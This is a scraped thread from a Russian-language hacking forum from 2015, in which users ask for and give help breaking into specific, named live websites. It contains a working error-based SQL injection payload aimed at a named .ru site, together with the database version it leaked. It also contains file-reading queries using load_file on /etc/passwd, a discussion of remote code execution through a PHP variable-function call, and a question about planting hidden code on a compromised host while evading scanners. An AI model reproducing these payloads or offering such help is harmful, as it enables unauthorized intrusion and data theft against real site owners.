ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.01.2015, 11:32
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Br@!ns
Br@!ns said:
select load_file('/etc/passwd')
даже если так, то можно узнать папки из /home/, однако из /home/user/ или /home/user/***/www/--- нет. другие варианты: брутфорс, раскрытие путей
или как вариант, если тебе нужен список сайтов под определенным юзером ищи конфиг апача
|
|
|
20.01.2015, 11:35
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от mazaxaka
mazaxaka said:
как через sql или phpmyadmin можно узнать список папок , в папке home/user/***/www/----
Если freebsd, то через пма можно узнать.
select load_file('home/user/') покажет все папки в папке user и т.д.
|
|
|
|
23.01.2015, 01:49
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от cipa21
cipa21 said:
никак не могу раскрутить инъекцию
http://stats.chancemotion.ru/get_content.php
пост num=50
Направьте на путь истинный. Спасибо!
error based в limit
Код:
Code:
num=50,25+PROCEDURE+ANALYSE+(0,(SELECT+3+ORDER+BY+extractvalue(1,concat(0x3A,version()))))--+
5.5.32
|
|
|
|
24.01.2015, 22:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
283
Репутация:
2
|
|
есть уязвимый кусок кода:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
могу передать в $function произвольное значение. Попытался передать phpinfo() + exit, но получил ошибку:
Код:
Code:
Fatal error: Call to undefined function phpinfo();exit()
Есть какой-нибудь вариант внедрения произвольного кода? |
|
|
|
24.01.2015, 23:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
15642
Репутация:
6
|
|
Сообщение от scr1m77
scr1m77 said:
есть уязвимый кусок кода:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
могу передать в $function произвольное значение. Попытался передать phpinfo() + exit, но получил ошибку:
Код:
Code:
Fatal error: Call to undefined function phpinfo();exit()
Есть какой-нибудь вариант внедрения произвольного кода? нормально напишите сударь что за функция?
|
|
|
|
24.01.2015, 23:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
283
Репутация:
2
|
|
Сообщение от UXOR
UXOR said:
нормально напишите сударь что за функция?
вроде предельно ясно написано, могу передавать произвольное значение. Например:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
|
|
|
|
25.01.2015, 00:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Сообщение от scr1m77
scr1m77 said:
вроде предельно ясно написано, могу передавать произвольное значение. Например:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Если не контролируются параметры (хотя бы один), то вряд ли получится RCE.
|
|
|
|
27.01.2015, 15:56
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
http://www.wirtschaftsfrauen.ch/index.php?id=55&no_cache=1&tx_cal_controller%5Bvie w%5D=event&tx_cal_controller%5Btype%5D=tx_cal_phpi calendar&tx_cal_controller%5Buid%5D=357&tx_cal_con troller%5Blastview%5D=view-list%7Cpage_id-55&tx_cal_controller%5Byear%5D=2014&tx_cal_control ler%5Bday%5D=04
Можно чё нить с этим сделать?
Обратил внимание на ' for key 'idx_link_old' SQL=INSERT INTO `wrf_redirect_links`
|
|
|
|
27.01.2015, 19:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Есть активная XSS на одном сайте и я хочу получить от него админку, но фишка вся с хостом. Под хостом имеется ввиду мой шелл на котором уже есть свой файл .htaccess в который нам нужно вставить свой код. .. Так вот вопрос, если я дополнительно вставлю свой код, на работе самого сайта это никак не отразится... сканеры могут обнаружить этот код?!
|
|
|
|
27.01.2015, 21:24
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от DezMond™
DezMond™ said:
http://www.wirtschaftsfrauen.ch/index.php?id=55&no_cache=1&tx_cal_controller%5Bvie w%5D=event&tx_cal_controller%5Btype%5D=tx_cal_phpi calendar&tx_cal_controller%5Buid%5D=357&tx_cal_con troller%5Blastview%5D=view-list%7Cpage_id-55&tx_cal_controller%5Byear%5D=2014&tx_cal_control ler%5Bday%5D=04
Можно чё нить с этим сделать?
Обратил внимание на ' for key 'idx_link_old' SQL=INSERT INTO `wrf_redirect_links`
Ресурс, приведенный вами, ведет логи. Ошибка происходит вследствие того, что каждый URL считается уникальным. После повторного захода по этому же URL возникает ошибка Duplicate entry. Это не SQLi.
Сообщение от Unknowhacker
Unknowhacker said:
сканеры могут обнаружить этот код?!
Конечно могут.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
